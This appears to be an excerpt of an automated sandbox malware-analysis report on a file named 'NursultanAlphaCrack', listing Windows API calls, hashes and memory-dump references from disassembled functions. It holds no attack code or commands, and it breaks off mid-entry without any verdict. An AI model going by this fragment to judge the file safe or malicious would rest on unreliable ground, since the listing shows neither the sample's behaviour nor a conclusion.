                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 7937dcb0fc1d226f4dd5f56da46a80e36a46ded6417d23cb97ebd155316ec06b
                                                                                        • Instruction ID: 87e1ee6b85c02e589a8efed055e6c2b2728e2ef40d7a0a0068b9f073075e5c64
                                                                                        • Opcode Fuzzy Hash: 7937dcb0fc1d226f4dd5f56da46a80e36a46ded6417d23cb97ebd155316ec06b
                                                                                        • Instruction Fuzzy Hash: 3FA011CA2E80883CB008B2A02E02C3B028CC8E0B23332822FF800C82C0AA80280028B0
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE51F
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 0dc0fe2b86fd25844705c76f79bc8ec98436d8e88d9e4500e7ecf01ddd8e48dd
                                                                                        • Instruction ID: 870437821b6f03062069342634a2801930d199fddcdaca6594df7ef740d43922
                                                                                        • Opcode Fuzzy Hash: 0dc0fe2b86fd25844705c76f79bc8ec98436d8e88d9e4500e7ecf01ddd8e48dd
                                                                                        • Instruction Fuzzy Hash: 27A012C515C0467C700831002D02C3B014CC0D1F62330451FF401CC2806A401C003470
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE580
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 7a309591b568f655615a12b57150e33ca472998272960853f2c9c498bbc1fc99
                                                                                        • Instruction ID: c2db7de7044427e041dfa55ddd493ef7d7a0f7296a8e4c6ed9f6bdb1a173fd5c
                                                                                        • Opcode Fuzzy Hash: 7a309591b568f655615a12b57150e33ca472998272960853f2c9c498bbc1fc99
                                                                                        • Instruction Fuzzy Hash: 5FA012C519C0457C700871502D02C37014CC4C0B63331441FF401C82C06A4018002470
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE580
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 723418da0ebe85c1826c131abd9bcf60c05012313edce421d8f81c83fb5b0fe4
                                                                                        • Instruction ID: c2db7de7044427e041dfa55ddd493ef7d7a0f7296a8e4c6ed9f6bdb1a173fd5c
                                                                                        • Opcode Fuzzy Hash: 723418da0ebe85c1826c131abd9bcf60c05012313edce421d8f81c83fb5b0fe4
                                                                                        • Instruction Fuzzy Hash: 5FA012C519C0457C700871502D02C37014CC4C0B63331441FF401C82C06A4018002470
                                                                                        APIs
                                                                                        • SetEndOfFile.KERNELBASE(?,001C903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 001C9F0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: File
                                                                                        • String ID:
                                                                                        • API String ID: 749574446-0
                                                                                        • Opcode ID: c0e76a368f3818886a1704336376efa3724d2aef78baab7651d459e0fddfd6a9
                                                                                        • Instruction ID: 1761596a60b1edf2f0891b1d52ceb86c337aa787ed8f37a09446bec3191039ea
                                                                                        • Opcode Fuzzy Hash: c0e76a368f3818886a1704336376efa3724d2aef78baab7651d459e0fddfd6a9
                                                                                        • Instruction Fuzzy Hash: 38A0113008000A8A8E802B30CA0802C3B20EBA0BC030002A8A00ACA8A2CB22888BCA00
                                                                                        APIs
                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,001DAE72,C:\Users\user\Desktop,00000000,0020946A,00000006), ref: 001DAC08
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 1611563598-0
                                                                                        • Opcode ID: c50f3366c9d631f360750d662a81a142830ce9ba8ca44baa3ba11cb551d5e108
                                                                                        • Instruction ID: a963400eb571d1d87bd40a11115bfd6a0378c03fde6cdc3debf0fec62bbeb745
                                                                                        • Opcode Fuzzy Hash: c50f3366c9d631f360750d662a81a142830ce9ba8ca44baa3ba11cb551d5e108
                                                                                        • Instruction Fuzzy Hash: ABA011302082008B82000B328F0AA0EBAAAAFA2B00F00C028A00080030CB30C8A0EA00
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(000000FF,?,?,001C95D6,?,?,?,?,?,001F2641,000000FF), ref: 001C963B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: dbb145a95ed37b3b59738b5fb0f790ed51e28419fbbae2f7a62b4914ba33095c
                                                                                        • Instruction ID: f9a09e120b579f93470e18360361db9889c9e0659e9d28534d60b15279b7799c
                                                                                        • Opcode Fuzzy Hash: dbb145a95ed37b3b59738b5fb0f790ed51e28419fbbae2f7a62b4914ba33095c
                                                                                        • Instruction Fuzzy Hash: C3F08270481B259FDB308A24C45CF92B7E9AB32321F045B1ED4F7429E0D771E98DCA40
                                                                                        APIs
                                                                                          • Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
                                                                                          • Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370
                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 001DC2B1
                                                                                        • EndDialog.USER32(?,00000006), ref: 001DC2C4
                                                                                        • GetDlgItem.USER32(?,0000006C), ref: 001DC2E0
                                                                                        • SetFocus.USER32(00000000), ref: 001DC2E7
                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 001DC321
                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 001DC358
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 001DC36E
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001DC38C
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 001DC39C
                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001DC3B8
                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001DC3D4
                                                                                        • _swprintf.LIBCMT ref: 001DC404
                                                                                          • Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5
                                                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 001DC417
                                                                                        • FindClose.KERNEL32(00000000), ref: 001DC41E
                                                                                        • _swprintf.LIBCMT ref: 001DC477
                                                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 001DC48A
                                                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 001DC4A7
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 001DC4C7
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 001DC4D7
                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001DC4F1
                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001DC509
                                                                                        • _swprintf.LIBCMT ref: 001DC535
                                                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 001DC548
                                                                                        • _swprintf.LIBCMT ref: 001DC59C
                                                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 001DC5AF
                                                                                          • Part of subcall function 001DAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001DAF35
                                                                                          • Part of subcall function 001DAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,001FE72C,?,?), ref: 001DAF84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                        • API String ID: 797121971-1840816070
                                                                                        • Opcode ID: 1d56f67ef8d8f58b0f46fcf0b04e42281b6f65d4aaabe769d74fbb8acfa6c13a
                                                                                        • Instruction ID: 9275dcc92dde22845b1f8c6d8a3c1a8cb32528408e2b338dfb5a67ba102e1c9c
                                                                                        • Opcode Fuzzy Hash: 1d56f67ef8d8f58b0f46fcf0b04e42281b6f65d4aaabe769d74fbb8acfa6c13a
                                                                                        • Instruction Fuzzy Hash: 7B919172248349BBD231DBA4DC49FFB77ACEB59700F00481AB749D6181DB75EA05CBA2
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C6FAA
                                                                                        • _wcslen.LIBCMT ref: 001C7013
                                                                                        • _wcslen.LIBCMT ref: 001C7084
                                                                                          • Part of subcall function 001C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001C7AAB
                                                                                          • Part of subcall function 001C7A9C: GetLastError.KERNEL32 ref: 001C7AF1
                                                                                          • Part of subcall function 001C7A9C: CloseHandle.KERNEL32(?), ref: 001C7B00
                                                                                          • Part of subcall function 001CA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,001C977F,?,?,001C95CF,?,?,?,?,?,001F2641,000000FF), ref: 001CA1F1
                                                                                          • Part of subcall function 001CA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,001C977F,?,?,001C95CF,?,?,?,?,?,001F2641), ref: 001CA21F
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 001C7139
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001C7155
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 001C7298
                                                                                          • Part of subcall function 001C9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001C73BC,?,?,?,00000000), ref: 001C9DBC
                                                                                          • Part of subcall function 001C9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 001C9E70
                                                                                          • Part of subcall function 001C9620: CloseHandle.KERNELBASE(000000FF,?,?,001C95D6,?,?,?,?,?,001F2641,000000FF), ref: 001C963B
                                                                                          • Part of subcall function 001CA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA501
                                                                                          • Part of subcall function 001CA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA532
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                        • API String ID: 3983180755-3508440684
                                                                                        • Opcode ID: b67bb171ef893233b63942543642b82781b58749041cc17b7ff2f82a298fe436
                                                                                        • Instruction ID: cf09d581c87a2d6bbb1b9ba8110cf2f401d27a190288f4aec4af6de95488f2fe
                                                                                        • Opcode Fuzzy Hash: b67bb171ef893233b63942543642b82781b58749041cc17b7ff2f82a298fe436
                                                                                        • Instruction Fuzzy Hash: 54C1C371904648AADB25EB74CC45FEEB3A8BF34300F04455EFA56E7282DB74EA44CB61
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: __floor_pentium4
                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                        • API String ID: 4168288129-2761157908
                                                                                        • Opcode ID: 61c8b94092174953596e867187e6b9557592dc2ae5222c6946403ae08e1368ad
                                                                                        • Instruction ID: d62418196281482a85c2a741eca8049de3762df234896034bc9eeca349cd5d51
                                                                                        • Opcode Fuzzy Hash: 61c8b94092174953596e867187e6b9557592dc2ae5222c6946403ae08e1368ad
                                                                                        • Instruction Fuzzy Hash: D3C23971E08A688FDB29CE299D407EEB7F5EB44304F1541EAD44EE7281E775AE818F40
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog_swprintf
                                                                                        • String ID: CMT$h%u$hc%u
                                                                                        • API String ID: 146138363-3282847064
                                                                                        • Opcode ID: eb06f6b53c8f0b3eb559b14f000d29ad52b8af17babc654a44ec11e3ec9c9bec
                                                                                        • Instruction ID: 96d4d0d254376aca5b0b6a3b3fd6725e18f593ffca3d1eac141bbc5bc2e02dfb
                                                                                        • Opcode Fuzzy Hash: eb06f6b53c8f0b3eb559b14f000d29ad52b8af17babc654a44ec11e3ec9c9bec
                                                                                        • Instruction Fuzzy Hash: E232A171514285ABDB18DF74C896FEA3BA5AF35300F04447DFD9A8B282DB70DA49CB60
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C2874
                                                                                        • _strlen.LIBCMT ref: 001C2E3F
                                                                                          • Part of subcall function 001D02BA: __EH_prolog.LIBCMT ref: 001D02BF
                                                                                          • Part of subcall function 001D1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001CBAE9,00000000,?,?,?,00010440), ref: 001D1BA0
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C2F91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                        • String ID: CMT
                                                                                        • API String ID: 1206968400-2756464174
                                                                                        • Opcode ID: 7b401467689371bd98c8973432acaf5ea534297f94b87fd0019e3bbe9d59f907
                                                                                        • Instruction ID: 599057151ec4f4f0ae65a0d6b95a11294542de8d5e76bb94512366d5f6f63875
                                                                                        • Opcode Fuzzy Hash: 7b401467689371bd98c8973432acaf5ea534297f94b87fd0019e3bbe9d59f907
                                                                                        • Instruction Fuzzy Hash: C762E5715002458FDB19DF78C896FEA3BA1AF75300F08857EEC9A8B282DB75D945CB60
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001DF844
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 001DF910
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001DF930
                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 001DF93A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 254469556-0
                                                                                        • Opcode ID: 27a3281027248a889bc0c463bea88591cf2823cc0c7744d1cc0a02576f4d0296
                                                                                        • Instruction ID: 76a2d1ee229c98434d3f0ee48ef83347a747bc30f9d09888071e42ea006fd04d
                                                                                        • Opcode Fuzzy Hash: 27a3281027248a889bc0c463bea88591cf2823cc0c7744d1cc0a02576f4d0296
                                                                                        • Instruction Fuzzy Hash: CB312575D052199BDB20DFA4D989BCCBBB8AF08304F1040AAE40DAB350EB719B85CF45
                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(80000000,001DE5E8,0000001C,001DE7DD,00000000,?,?,?,?,?,?,?,001DE5E8,00000004,00221CEC,001DE86D), ref: 001DE6B4
                                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,001DE5E8,00000004,00221CEC,001DE86D), ref: 001DE6CF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                        • String ID: D
                                                                                        • API String ID: 401686933-2746444292
                                                                                        • Opcode ID: 48fbdf413521ad1953bb28117f50206d54abb36c5be56ee7bb6d3a58e95dc321
                                                                                        • Instruction ID: 648354cf19f54459c7d865edbd6f203afeabdf26ec129e628f83cba51544fef0
